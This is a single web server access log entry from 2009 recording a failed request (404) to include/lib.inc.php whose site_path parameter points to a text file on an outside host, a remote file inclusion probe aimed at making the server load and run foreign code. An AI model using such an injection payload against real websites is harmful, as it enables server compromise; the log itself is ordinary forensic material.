217.125.38.117 - - [19/Jun/2009:02:19:22 -0400] "GET //include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
